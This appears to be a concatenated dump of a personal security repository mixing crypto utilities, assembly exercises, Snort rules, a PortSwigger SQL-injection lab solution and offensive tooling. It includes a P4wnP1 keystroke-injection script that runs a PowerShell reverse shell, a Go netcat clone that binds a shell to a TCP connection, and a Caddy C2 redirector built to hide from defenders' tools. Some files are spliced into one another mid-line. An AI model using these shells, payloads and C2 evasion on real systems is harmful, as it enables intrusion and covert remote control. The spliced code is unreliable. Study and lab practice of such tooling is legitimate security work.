/Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | using System; 12 | using System.Reflection; 13 | 14 | [assembly: System.Reflection.AssemblyCompanyAttribute("CSharpAES")] 15 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")] 16 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 17 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 18 | [assembly: System.Reflection.AssemblyProductAttribute("CSharpAES")] 19 | [assembly: System.Reflection.AssemblyTitleAttribute("CSharpAES")] 20 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 21 | 22 | // Generated by the MSBuild WriteCodeFragment class. 
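23 | 24 | -------------------------------------------------------------------------------- /Defense/Canaries/FileCanaries/emailer.py: --------------------------------------------------------------------------------
from email.message import EmailMessage
from smtplib import SMTP_SSL, SMTPException
from ssl import create_default_context


class Emailer():
    """Deliver canary alerts over SMTPS (implicit TLS on ``smtp_port``).

    Usage::

        with Emailer(host, 465) as mailer:
            if mailer.authenticate(user, password):
                mailer.send(to, "canary tripped", details)

    ``authenticate`` and ``send`` return booleans instead of raising so an
    alerting path can fall back to another channel. They only swallow
    SMTP/socket errors (the original used bare ``except:``), never
    programming errors.
    """

    def __init__(self, smtp_server, smtp_port):
        self.smtp_server = smtp_server
        self.smtp_port = smtp_port
        # Populated by authenticate(); send() refuses to run until then
        # (the original raised AttributeError if send() came first).
        self.sender_email = None
        self.server = None

    def __enter__(self):
        # create_default_context() enables certificate and hostname
        # verification. An alert channel must not be downgraded to an
        # unverified context: the alert and the SMTP credentials would be
        # exposed to anyone on path.
        context = create_default_context()
        self.server = SMTP_SSL(self.smtp_server, self.smtp_port, context=context)
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            self.server.quit()
        except (SMTPException, OSError):
            # The session may already be gone; closing is best-effort.
            pass
        return False

    def authenticate(self, sender_email, password):
        """Log in as ``sender_email``. Returns True on success, False on failure."""
        self.sender_email = sender_email
        try:
            self.server.login(self.sender_email, password)
        except (SMTPException, OSError):
            return False
        return True

    @staticmethod
    def build_message(sender_email, recipient_email, subject, body):
        """Build the RFC 5322 message that ``send`` transmits.

        ``recipient_email`` is one address or a list of addresses.

        The original built the message by string concatenation
        (``f"Subject:{subject}\\n\\n{msg}"``). A subject containing a line
        break therefore injected arbitrary headers (an extra ``Bcc:``, a
        rewritten ``From:``) -- and canary subjects often embed
        attacker-influenced data such as the path or user that tripped
        the canary. Header values containing CR/LF are rejected here and
        ``EmailMessage`` takes care of encoding and folding the rest.

        Raises ValueError if the subject or an address contains a line break.
        """
        if isinstance(recipient_email, str):
            recipients = [recipient_email]
        else:
            recipients = list(recipient_email)
        for value in (subject, sender_email, *recipients):
            if "\r" in value or "\n" in value:
                raise ValueError("header values must not contain line breaks")
        message = EmailMessage()
        message["From"] = sender_email
        message["To"] = ", ".join(recipients)
        message["Subject"] = subject
        message.set_content(body)
        return message

    def send(self, recipient_email, subject, msg):
        """Send ``msg`` with ``subject`` to ``recipient_email``.

        Returns False without sending if ``authenticate`` has not succeeded
        yet, if the subject/addresses are malformed, or if the server
        rejects the message; True otherwise.
        """
        if self.sender_email is None:
            return False
        try:
            message = self.build_message(self.sender_email, recipient_email, subject, msg)
            # Envelope addresses are passed explicitly so they match the
            # headers regardless of how recipient_email was given.
            self.server.send_message(message, from_addr=self.sender_email,
                                     to_addrs=recipient_email)
        except (ValueError, SMTPException, OSError):
            return False
        return True
-------------------------------------------------------------------------------- /Containerization/kubernetes/top-10-security-best-practices-checklist/README.md: -------------------------------------------------------------------------------- 1 | # Top 10 Kubernetes Security Best Practices Checklist 2 | 3 | - [ ] Image Scanning 4 | - perform image scanning to detect malicious images attempting to infiltrate deployments 5 | - use static security and vulnerability scanning tools such as `docker scan` which leverages Snyk, Clair, Anchore, Qualys, etc 6 | - [ ] Avoid Using Root User 7 | - users with the least amount of privileges required to perform a function should be created to execute containerized applications 8 | - helps prevent against common container breakout techniques 9 | - `RUN groupadd -r app && useradd -g app 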
appuser` 10 | - `RUN chown -R appuser:app /app` 11 | - `USER appuser` 12 | - [ ] Users & Permissions with Role-based Access Controls (RBAC) 13 | - [ ] Use Network Policies 14 | - [ ] Encrypt Communication 15 | - [ ] Secure Secrets 16 | - [ ] Secure etcd 17 | - [ ] Automated Backup & Restore 18 | - [ ] Configure Security Policies 19 | - [ ] Disaster Recovery 20 | 21 | #### References 22 | 23 | - [TechWorld with Nana Kubernetes Security Best Practices Video](https://www.youtube.com/watch?v=oBf5lrmquYI) 24 | -------------------------------------------------------------------------------- /Cryptography/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 zeugirdoR sixelA 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /Misc/DFIR-Tools/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 zeugirdoR sixelA 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /OffensiveGo/DNS/DNSExfiltration/go.sum: -------------------------------------------------------------------------------- 1 | github.com/alexflint/go-arg v1.4.3 h1:9rwwEBpMXfKQKceuZfYcwuc/7YY7tWJbFsgG5cAU/uo= 2 | github.com/alexflint/go-arg v1.4.3/go.mod h1:3PZ/wp/8HuqRZMUUgu7I+e1qcpUbvmS258mRXkFH4IA= 3 | github.com/alexflint/go-scalar v1.1.0 h1:aaAouLLzI9TChcPXotr6gUhq+Scr8rl0P9P4PnltbhM= 4 | github.com/alexflint/go-scalar v1.1.0/go.mod h1:LoFvNMqS1CPrMVltza4LvnGKhaSpc3oyLEBUZVhhS2o= 5 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 6 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 7 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 8 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 9 | github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs= 10 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 11 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 12 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 13 | -------------------------------------------------------------------------------- /PhysicalPentestStuff/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Alexis Rodriguez 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to 
whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/convert_to_big_little_endian.py: -------------------------------------------------------------------------------- 1 | from sys import argv, exit 2 | 3 | def to_little_endian(mem_addr:str): 4 | mem_addr=mem_addr.replace("0x", "") 5 | l=[] 6 | if len(mem_addr) % 2 != 0: 7 | print(f"Memory address length must be even") 8 | exit(1) 9 | for i in range(len(mem_addr)-1, -1, -2): 10 | l.append(mem_addr[i-1]+mem_addr[i]) 11 | return "\\x"+"\\x".join(l) 12 | 13 | def to_big_endian(mem_addr:str): 14 | mem_addr=mem_addr.replace("0x", "") 15 | l=[] 16 | if len(mem_addr) % 2 != 0: 17 | print(f"Memory address length must be even") 18 | exit(1) 19 | for i in range(0, len(mem_addr), 2): 20 | l.append(mem_addr[i]+mem_addr[i+1]) 21 | return "\\x"+"\\x".join(l) 22 | 23 | if __name__ == "__main__": 24 | if len(argv) < 2: 25 | print(f"Usage: {__file__} > r.ps1"); 25 | delay(100); 26 | press("ENTER"); 27 | 28 | // execute powershell script 29 | type("./r.ps1"); 30 | delay(100); 31 | press("ENTER"); 32 | 33 | // close powershell 34 | press("ALT 4"); 35 | } 36 | 37 | reverse_shell(); 38 | 39 | // run with: 40 | // P4wnP1_cli hid 
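run powershell_reverse_shell.js 41 | -------------------------------------------------------------------------------- /Misc/emailer.py: --------------------------------------------------------------------------------
import smtplib
import ssl
from email.message import EmailMessage


class Emailer():
    """Send mail over SMTPS (implicit TLS on ``smtp_port``).

    Usage::

        with Emailer(host, 465) as mailer:
            if mailer.authenticate(user, password):
                mailer.send(to, "subject", body)

    ``authenticate`` and ``send`` return booleans instead of raising. They
    only swallow SMTP/socket errors (the original used bare ``except:``),
    never programming errors.
    """

    def __init__(self, smtp_server, smtp_port):
        self.smtp_server = smtp_server
        self.smtp_port = smtp_port
        # Populated by authenticate(); send() refuses to run until then
        # (the original raised AttributeError if send() came first).
        self.sender_email = None
        self.server = None

    def __enter__(self):
        # ssl.create_default_context() verifies the server certificate and
        # hostname; do not replace it with an unverified context.
        context = ssl.create_default_context()
        self.server = smtplib.SMTP_SSL(self.smtp_server,
                                       self.smtp_port,
                                       context=context)
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            self.server.quit()
        except (smtplib.SMTPException, OSError):
            # The session may already be gone; closing is best-effort.
            pass
        return False

    def authenticate(self, sender_email, password):
        """Log in as ``sender_email``. Returns True on success, False on failure."""
        self.sender_email = sender_email
        try:
            self.server.login(self.sender_email, password)
        except (smtplib.SMTPException, OSError):
            return False
        return True

    @staticmethod
    def build_message(sender_email, recipient_email, subject, body):
        """Build the RFC 5322 message that ``send`` transmits.

        ``recipient_email`` is one address or a list of addresses.

        The original built the message by string concatenation
        (``f"Subject:{subject}\\n\\n{msg}"``), so a subject containing a line
        break injected arbitrary headers (e.g. an extra ``Bcc:``). Header
        values containing CR/LF are rejected here and ``EmailMessage``
        handles encoding and folding of the rest.

        Raises ValueError if the subject or an address contains a line break.
        """
        if isinstance(recipient_email, str):
            recipients = [recipient_email]
        else:
            recipients = list(recipient_email)
        for value in (subject, sender_email, *recipients):
            if "\r" in value or "\n" in value:
                raise ValueError("header values must not contain line breaks")
        message = EmailMessage()
        message["From"] = sender_email
        message["To"] = ", ".join(recipients)
        message["Subject"] = subject
        message.set_content(body)
        return message

    def send(self, recipient_email, subject, msg):
        """Send ``msg`` with ``subject`` to ``recipient_email``.

        Returns False without sending if ``authenticate`` has not succeeded
        yet, if the subject/addresses are malformed, or if the server
        rejects the message; True otherwise.
        """
        if self.sender_email is None:
            return False
        try:
            message = self.build_message(self.sender_email, recipient_email, subject, msg)
            # Envelope addresses are passed explicitly so they match the
            # headers regardless of how recipient_email was given.
            self.server.send_message(message, from_addr=self.sender_email,
                                     to_addrs=recipient_email)
        except (ValueError, smtplib.SMTPException, OSError):
            return False
        return True
-------------------------------------------------------------------------------- /CTFs/TenableCTF/RabbitHole/sol.py: -------------------------------------------------------------------------------- 1 | from requests import get 2 | from time import sleep 3 | from re import search 4 | 5 | proxies = { 6 | "http": "http://127.0.0.1:8080", 7 | "https":"https://127.0.0.1:443" 8 | } 9 | 10 | letters_and_nums = "" 11 | 12 | def send_req(base_url, page=None): 13 | global letters_and_nums 14 | 15 | if page: 16 | params = {"page": page} 17 | else: 18 | params = {} 19 | 20 | #resp = get(base_url, params=params, proxies=proxies).text 21 | resp = get(base_url, params=params).text 22 | print(resp) 23 | if "flag" not in resp: 24 | page = search(r"([A-Za-z0-9]{5,})", resp).group(1) 25 | h = search(r"\'([A-Fa-f0-9]{2})\'", resp).group(1) 26 | letters_and_nums += (":" 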
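+ h) 27 | print(letters_and_nums) 28 | #b = bytes.fromhex(h) 29 | #try: 30 | # print(b.decode("ASCII")) 31 | #except: 32 | # pass 33 | return page 34 | 35 | 36 | def main(): 37 | url = "http://167.71.246.232:8080/rabbit_hole.php" 38 | page = send_req(url) 39 | while True: 40 | page = send_req(url, page) 41 | sleep(0.5) 42 | 43 | main() 44 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPClients/requests.go: --------------------------------------------------------------------------------
package main

import (
	"fmt"
	"io/ioutil"
	"net/http"
	"net/url"
	"strings"
	"time"
)

// Three ways of issuing HTTP requests with the standard library: the
// package-level helpers (http.Get / http.Post) and an explicit http.Client.
//
// Every response body must be closed, otherwise the underlying connection is
// never returned to the pool and leaks. The original deferred
// resp.Body.Close() *before* checking err -- on a failed request resp is nil,
// so the deferred call panicked with a nil pointer dereference -- and because
// defer captured resp.Body at that point, only the first body was ever closed.
func main() {
	// GET request
	resp, err := http.Get("https://www.google.com/robots.txt")
	if err != nil {
		panic(err)
	}
	fmt.Println(resp.Status)
	resp.Body.Close()

	// POST request (form-encoded body)
	form := url.Values{}
	form.Add("Name", "Binexis")
	resp, err = http.Post(
		"https://www.google.com/robots.txt",
		"application/x-www-form-urlencoded",
		strings.NewReader(form.Encode()),
	)
	if err != nil {
		panic(err)
	}
	fmt.Println(resp.Status)
	resp.Body.Close()

	// GET via http.NewRequest + http.Client for more control (headers,
	// cookies, redirect policy, ...). The package-level helpers use a client
	// with no timeout at all, so a stalled server hangs the program forever;
	// give this one an explicit deadline.
	req, err := http.NewRequest("GET", "https://www.google.com/robots.txt", nil)
	if err != nil {
		panic(err)
	}
	client := http.Client{Timeout: 10 * time.Second}
	resp, err = client.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()
	fmt.Println(resp.Status)

	// Reading the response body
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		panic(err)
	}

	fmt.Println(string(body))
}
-------------------------------------------------------------------------------- /OffensiveGo/NetcatClone/client.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net" 6 | "os" 7 | "os/exec" 8 | "strconv" 9 | ) 10 | 11 | type Command 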
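struct { 12 | Program string 13 | Args []string 14 | Cmd *exec.Cmd 15 | } 16 | 17 | func (c *Command) exec(conn net.Conn) { 18 | c.Cmd = exec.Command(c.Program, c.Args...) 19 | c.Cmd.Stdin = conn 20 | c.Cmd.Stdout = conn 21 | c.Cmd.Stderr = conn 22 | c.Cmd.Run() 23 | } 24 | 25 | 
// connect dials ip:port over TCP and returns the open connection.
//
// A failed dial is fatal. The original printed a message but still returned
// the nil *net.TCPConn wrapped in a net.Conn interface -- which is non-nil as
// an interface value -- so the caller went on to wire it into exec.Cmd and
// crashed later with a far less useful nil-pointer panic. Exiting here keeps
// the behaviour (no shell without a connection) and the diagnostic together.
func connect(ip string, port int) net.Conn {
	connectStr := fmt.Sprintf("%s:%d", ip, port)
	conn, err := net.Dial("tcp", connectStr)
	if err != nil {
		fmt.Printf("couldn't connect to %s...\n", connectStr)
		os.Exit(1)
	}
	return conn
}
33 | 34 | func main() { 35 | thisProgram := os.Args[0] 36 | if len(os.Args[:]) < 4 { 37 | fmt.Println(fmt.Sprintf("usage: %s $EXTERNAL_NET $HTTP_PORTS (msg:"Probable phishing attack"; flow:established,to_server; content:"GET"; http_method; content:"/ldkfJu.php?"; http_uri; classtype:trojan-activity; sid:10000001; rev:1;) 2 | 3 | 
# Syntax fixes (rev bumped on each changed rule):
#  - sid 10000002: the pcre had no closing "/" delimiter, so the rule did not
#    parse -- Snort treats that as a fatal error at load time and the whole
#    rule file is lost. Delimiter added, plus the U modifier so the pattern is
#    evaluated against the normalized URI buffer like the content before it.
#  - sid 10000003: options after msg were separated with "," instead of ";",
#    another parse error.
#  - sid 10000004: classtype added so priority/reporting matches the set.
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Probable post-infection - Indicator"; flow:established,to_server; content:"GET"; http_method; content:"/bibi/"; http_uri; pcre:"/\.(txt|exe|tiff|dll|zip)/U"; classtype:trojan-activity; sid:10000002; rev:2;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Boleto - Second Indicator"; flow:established,to_server; content:"GET"; http_method; content:"/bsb/infects/index.php?"; http_uri; classtype:trojan-activity; sid:10000003; rev:2;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Boleto - Third Indicator"; flow:established,to_server; content:"GET"; http_method; content:"/bdb/debugnosso/index.php?"; http_uri; classtype:trojan-activity; sid:10000004; rev:2;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Boleto - Fourth Indicator"; flow:established,to_server; content:"POST"; http_method; content:"/metre/admin/x.php"; http_uri; classtype:trojan-activity; sid:10000005; rev:1;)
-------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab3/README.md: 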
-------------------------------------------------------------------------------- 1 | # Union Attacks > Determining the Number of Columns 2 | 3 | ### Objectives 4 | 5 | - Determine the number of columns returned by the server using either `ORDER BY [NUM]` or `UNION SELECT [NULL,...]-- -` methods 6 | - Once the number of columns is known, return an additional row containing a NULL values 7 | 8 | ### Solution 9 | 10 | The `category` query parameter is vulnerable to a SQL Injection UNION attack. To determine the number of columns being returned in the response, use the following 11 | SQL payload: 12 | 13 | ``` 14 | https://.web-security-academy.net/filter?category=Accessories' ORDER BY 1-- - 15 | ``` 16 | 17 | Increment the count by 1 until you get an internal server error - specifying `ORDER BY 4-- -`, returns the error. So we now know the number of columns being 18 | return is **3**. 19 | 20 | To solve the challenge, use the following request to solve the challenge (notice we are using 3 NULLs because we determine each row returned in the response 21 | consists of 3 columns): 22 | 23 | ``` 24 | https://.web-security-academy.net/filter?category=Accessories' UNION SELECT NULL,NULL,NULL-- - 25 | ``` 26 | -------------------------------------------------------------------------------- /SLAE/MovingData/movingdata.nasm: -------------------------------------------------------------------------------- 1 | ; Author : Alexis Rodriguez 2 | ; Date : 06/28/2020 3 | ; File : movingdata.nasm 4 | ; IS ; x86 Assembly 5 | 6 | global _start 7 | 8 | section .text 9 | _start: 10 | ; move data directly into registers 11 | mov eax, 0xaaaaaa 12 | mov al, 0xbb 13 | mov ah, 0xcc 14 | mov ax, 0xdddd 15 | 16 | ; moving data from register to register 17 | mov ebx, eax 18 | mov cl, al 19 | mov ch, ah 20 | mov cx, ax 21 | 22 | mov ebx, 0 23 | mov ecx, 0 24 | 25 | ; moving data from memory into registers 26 | mov al, [sample] 27 | mov ah, [sample+1] 28 | mov bx, [sample] 29 | mov ecx, [sample] 30 | 
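31 | ; moving data from registers into memory 32 | mov eax, 0x33445566 33 | mov byte [sample], al 34 | mov word [sample], ax 35 | mov dword [sample], eax 36 | 37 | ; move data into memory 38 | mov dword [sample], 0x33445566 39 | 40 | ; lea, load effective address usage 41 | lea eax, [sample] 42 | lea ebx, [eax] 43 | 44 | ; xchg, exchange usage 45 | mov eax, 0x11223344 46 | mov ebx, 0xaabbccdd 47 | xchg eax, ebx 48 | 49 | ; exiting program with exit code 0 (ebx is the status passed to exit; the old comment said 2) 50 | mov eax, 0x1 51 | mov ebx, 0x0 52 | int 0x80 53 | 54 | section .data 55 | sample: db 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, 0x11, 0x22 56 | -------------------------------------------------------------------------------- /Cryptography/Hashing/file_hashing.py: --------------------------------------------------------------------------------
#!/usr/bin/env python3
"""
Print several digests of a file.

pip3 install prettytable   (only needed for the CLI table, not for importing
generate_hashes_for_file)
"""
import hashlib
from sys import argv, exit

# Order matters: it is the order of the returned tuple and of the table rows.
HASH_NAMES = ("md5", "sha1", "sha224", "sha256", "sha512")
CHUNK_SIZE = 64 * 1024


def generate_hashes_for_file(file_):
    """Return the (md5, sha1, sha224, sha256, sha512) hex digests of ``file_``.

    The file is streamed in 64 KiB chunks and every chunk is fed to all five
    hash objects, so one read pass suffices and the file never has to fit in
    memory (the original slurped it whole through an un-closed handle).
    Raises OSError if the file cannot be opened or read.

    MD5 and SHA-1 are produced only because threat-intel feeds and IOC lists
    still key on them; both are collision-broken and must not be used to
    decide whether a file is trusted -- compare the SHA-256 for that.
    """
    hashers = [hashlib.new(name) for name in HASH_NAMES]
    with open(file_, "rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK_SIZE), b""):
            for hasher in hashers:
                hasher.update(chunk)
    return tuple(hasher.hexdigest() for hasher in hashers)


if __name__ == "__main__":
    # Imported here so the hashing function stays usable without prettytable.
    from prettytable import PrettyTable

    if len(argv) < 2:
        print(f"Usage: {__file__} <file>")
        exit(1)
    file_ = argv[1]
    file_hashes = generate_hashes_for_file(file_)

    hash_algorithms = "MD5", "SHA1", "SHA224", "SHA256", "SHA512"
    print(f"Generating hashes for file: {file_}")
    t = PrettyTable(["Hash Function", "Digest"], padding_width=0)
    for algorithm, digest in zip(hash_algorithms, file_hashes):
        t.add_row([algorithm, digest])
    print(t)
--------------------------------------------------------------------------------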
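/Cryptography/Hashing/key_derivation_with_scrypt.py: --------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Derive a 32-byte key from a password with scrypt (cryptography library)."""

from cryptography.hazmat.primitives.kdf.scrypt import Scrypt
from cryptography.hazmat.backends import default_backend
from os import urandom
from sys import argv, exit


def generating_scrypt_key(key, salt=None):
    """Derive a 32-byte key from the password ``key``.

    Parameters:
        key:  the password, as str (UTF-8 encoded here) or bytes.
        salt: 16+ random bytes. Pass the salt stored with the original
              derivation to reproduce a key. If omitted a fresh random salt is
              drawn and discarded, so the result can never be re-derived --
              only useful for a one-shot demo.

    Returns the derived key as bytes.

    Two defects of the original are fixed here: it ignored ``key`` entirely
    and derived from the hard-coded literal b"deriveFromPasswor", so every
    password yielded the key for that one string; and the salt was generated
    inside the function and thrown away, so nothing could ever be verified
    against the output.

    scrypt parameters:
        length: size of the derived key in bytes
        n: CPU/memory cost. Must be a power of two (not merely "divisible by
           2" as the old comment said). 2**14 is the usual choice for
           interactive logins; 2**20 for sensitive, non-interactive
           derivations such as file-encryption keys.
        r: block size
        p: parallelism
    """
    if salt is None:
        salt = urandom(16)
    if isinstance(key, str):
        key = key.encode("utf-8")
    key_derivation_func = Scrypt(salt=salt, length=32,
                                 n=2**14, r=8, p=1,
                                 backend=default_backend())
    return key_derivation_func.derive(key)


if __name__ == "__main__":
    if len(argv) < 2:
        print(f"Usage: {__file__} <password>")
        exit(1)
    # NOTE: a password on the command line is visible in `ps` and shell
    # history; use getpass for anything beyond a demo.
    password = argv[1]
    # The salt must be stored next to the derived key or the key can never be
    # recomputed -- print both.
    salt = urandom(16)
    key = generating_scrypt_key(password, salt).hex()
    print(f"salt: {salt.hex()}")
    print(f"key:  {key}")
-------------------------------------------------------------------------------- /SLAE/Arithmetic/add_sub.nasm: -------------------------------------------------------------------------------- 1 | ; Author : Alexis Rodriguez 2 | ; Date : 06/29/2020 3 | ; File : add_sub.nasm 4 | ; IS : x86 Assembly 5 | 6 | global _start 7 | 8 | section .text 9 | _start: 10 | ; register based addition 11 | mov eax, 0x0 12 | add al, 0x22 13 | add al, 0x11 14 | 15 | mov ax, 0x1122 16 | add ax, 0x3344 17 | 18 | mov eax, 0xffffffff 19 | add eax, 0x10 20 | 21 | ; memory based addition 22 | mov eax, 0x0 23 | add byte [var1], 0x22 24 | add byte [var1], 0x11 25 | 26 | add word [var2], 0x1122 27 | add word [var2], 0x3344 28 | 29 | mov dword [var3], 0xffffffff 30 | add dword [var3], 0x10 31 | 32 | ; set / clear / complement 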
carry flag 33 | clc 34 | stc 35 | cmc 36 | 37 | ; add with carry 38 | mov eax, 0x0 39 | stc 40 | adc al, 0x22 41 | stc 42 | adc al, 0x11 43 | 44 | mov ax, 0x1122 45 | stc 46 | adc ax, 0x3344 47 | 48 | mov eax, 0xffffffff 49 | stc 50 | adc eax, 0x10 51 | 52 | ; subtract 53 | mov eax, 0xa 54 | sub eax, 0x5 55 | stc 56 | sbb eax, 0x4 57 | 58 | ; increment and decrement 59 | inc eax 60 | dec eax 61 | 62 | ; exit program 63 | mov eax, 0x1 64 | mov ebx, 0x0 65 | int 0x80 66 | 67 | section .data 68 | var1: db 0x00 69 | var2: dw 0x0000 70 | var3: dd 0x00000000 71 | -------------------------------------------------------------------------------- /Phishing/Gophish/ec2.tf: -------------------------------------------------------------------------------- 1 | resource "aws_instance" "gophish_instance" { 2 | subnet_id = "${aws_subnet.public_subnet.id}" 3 | ami = "${var.ami}" 4 | instance_type = "${var.instance_type}" 5 | key_name = "${aws_key_pair.gophish_ssh_key.key_name}" 6 | 7 | tags = { 8 | Name = "gophish-instance" 9 | } 10 | 11 | vpc_security_group_ids = [ "${aws_security_group.gophish_sg.id}" ] 12 | 13 | # Base64 encoded string of the `user-data.sh` Bash script in the current directory 14 | user_data_base64 = "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" 15 | } 16 | -------------------------------------------------------------------------------- /C2Routing/caddy/example_redirector/Caddyfile: -------------------------------------------------------------------------------- 1 | # Example Caddyfile checking for common blue team forensics user agents 2 | # and redirecting to amazon 3 | 4 | # global options 5 | { 6 | http_port 8000 7 | https_port 8443 8 | # turn off admin endpoint 9 | admin off 10 | } 11 | 12 | # server listening on port 8000 13 | :8000 { 14 | # log requests to stdout 15 | log { 16 | output stdout 17 | #output file ./access.log 18 | # use human-readable formating as opposed to JSON 19 | } 20 | 21 | # named matcher matching user agents with regex 22 | 
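@user-agent-blacklist {
    # Case-insensitive RE2 match against the User-Agent header.
    # Alternation binds loosest, so "curl|wget|nmap" fires when any of the
    # three tokens appears anywhere in the header. The previous pattern
    # "curl*|wget*|nmap*" was wrong: "*" applied only to the final letter,
    # so it also matched "cur", "wge" and "nma" -- more false positives and
    # no extra coverage.
    # NOTE: header_regexp allows a single regular expression per header.
    # NOTE: this only filters tools that announce themselves. A request with
    # a spoofed or missing User-Agent passes straight through, so treat it as
    # a low-effort sieve, not as access control for the C2.
    header_regexp User-Agent "(?i)curl|wget|nmap"
}

# redirect to amazon if the request user agent matches user-agent-blacklist
redir @user-agent-blacklist https://aws.amazon.com 301

# everything else is proxied to the C2 listener on localhost
reverse_proxy 127.0.0.1:31337 {
    header_up Host {upstream_hostport}
    header_up X-Forwarded-Host {host}
    header_up X-Forwarded-Port {port}
}
}

# example C2 server; {remote} is the IP:port of the connecting client
:31337 {
    respond "Hello, {remote}, from your C2"
}
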